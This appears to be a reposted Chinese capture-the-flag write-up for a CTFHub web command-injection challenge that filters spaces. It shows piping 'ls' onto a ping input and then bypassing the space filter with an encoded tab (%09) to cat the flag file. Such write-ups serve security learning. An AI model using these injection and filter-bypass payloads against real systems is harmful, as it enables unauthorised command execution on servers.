CTFHUB-web-RCE-过滤空格
开启标题https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvMDhjMzE4ZmZhODAyNDUyZTlmNDNjOWRmMzk1NzcwMzQucG5n
在 URL 反面拼接利用管道符实行注入,发现了 flag 的可疑文件
127.0.0.1|ls
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvYTY3Y2QyZTI2YTljNDhkMTliY2YyMTY0MDBkMDgxNDcucG5n
由于这题过滤了空格,假如在 URL 中输入空格,则不会实行 ping 下令。那么这里将空格更换为 %09 ,也就是 ASCII 的 Tab 键。右键查抄网页源代码发现了 flag
127.0.0.1|cat%09flag_78192418216123.php
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pLWJsb2cuY3NkbmltZy5jbi9kaXJlY3QvNmRjYTM4YWY2OWZlNDU0N2I0YzY4MGEzMDAwM2Q4M2YucG5n
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!qidao123.com:ToB企服之家,中国第一个企服评测及软件市场,开放入驻,技术点评得现金
页:
[1]